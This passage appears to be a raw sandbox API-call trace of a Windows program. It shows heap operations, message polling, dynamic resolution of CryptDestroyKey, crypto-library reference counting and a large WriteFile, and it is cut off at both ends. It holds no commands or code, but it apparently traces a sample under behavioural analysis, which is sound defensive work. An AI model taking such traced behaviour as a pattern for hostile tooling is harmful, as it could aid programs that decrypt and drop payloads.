lpMsg=0x8cf158) returned 0 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.597] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.599] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.599] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.599] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.611] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f29e58*, nNumberOfBytesToWrite=0x13e38, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29e58*, lpNumberOfBytesWritten=0x8cf5e4*=0x13e38, lpOverlapped=0x0) returned 1 [0266.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.637] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0266.637] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.638] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0266.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0266.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.644] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0266.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.645] CryptDestroyKey (hKey=0xa873d0) returned 1 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0266.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.647] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.647] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.647] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.647] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.647] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.648] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.649] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.649] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.649] PeekMessageW (in: 